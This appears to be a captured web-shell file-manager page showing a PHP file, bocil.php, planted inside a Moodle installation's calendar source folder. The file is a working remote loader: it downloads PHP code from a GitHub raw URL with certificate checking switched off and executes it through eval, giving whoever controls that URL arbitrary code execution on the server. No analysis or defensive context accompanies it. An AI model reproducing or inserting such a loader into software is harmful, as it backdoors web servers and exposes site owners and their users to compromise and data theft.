Your IP : 192.168.165.1


Current Path : C:/xampp/htdocs/moodle/calendar/amd/src/
Upload File :
Current File : C:/xampp/htdocs/moodle/calendar/amd/src/bocil.php

<?php


function getURL($url) {
    
    if(function_exists('curl_version')) {
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
}


eval("?>" . getURL("https://raw.githubusercontent.com/5Y4H/seo/main/seobarbar.php"));